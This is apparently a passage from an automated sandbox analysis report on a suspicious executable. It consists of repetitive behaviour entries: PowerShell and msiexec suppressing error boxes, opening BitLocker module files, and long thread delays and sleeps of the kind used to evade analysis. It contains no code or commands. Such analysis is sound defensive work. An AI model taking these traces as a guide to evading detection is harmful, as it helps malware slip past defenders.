          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599875Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599766Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599656Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599547Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599437Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599327Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599219Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599109Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599000Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598891Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598781Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598672Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598562Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598453Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598344Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598234Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598125Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598016Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597906Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597797Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597687Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597578Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597469Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597359Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597250Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597141Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597031Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596922Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596813Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596703Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596594Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596484Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596375Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596266Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596156Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596047Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595937Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595828Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595719Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595609Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595500Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595391Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595281Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595171Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595062Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594953Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594844Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594734Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594625Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5733Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3957Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7820Thread sleep time: -8301034833169293s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5292Thread sleep time: -27670116110564310s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5292Thread sleep time: -600000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5292Thread sleep time: -599875s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468Thread sleep count: 1332 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468Thread sleep count: 8529 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5292Thread sleep time: -599766s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5292Thread sleep time: -599656s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5292Thread sleep time: -599547s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5292Thread sleep time: -599437s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5292Thread sleep time: -599327s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5292Thread sleep time: -599219s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5292Thread sleep time: -599109s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5292Thread sleep time: -599000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5292Thread sleep time: -598891s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5292Thread sleep time: -598781s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5292Thread sleep time: -598672s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5292Thread sleep time: -598562s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5292Thread sleep time: -598453s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5292Thread sleep time: -598344s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5292Thread sleep time: -598234s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5292Thread sleep time: -598125s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5292Thread sleep time: -598016s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5292Thread sleep time: -597906s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5292Thread sleep time: -597797s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5292Thread sleep time: -597687s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5292Thread sleep time: -597578s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5292Thread sleep time: -597469s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5292Thread sleep time: -597359s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5292Thread sleep time: -597250s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5292Thread sleep time: -597141s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5292Thread sleep time: -597031s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5292Thread sleep time: -596922s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5292Thread sleep time: -596813s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5292Thread sleep time: -596703s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5292Thread sleep time: -596594s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5292Thread sleep time: -596484s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5292Thread sleep time: -596375s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5292Thread sleep time: -596266s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5292Thread sleep time: -596156s >= -30000sJump to behavior
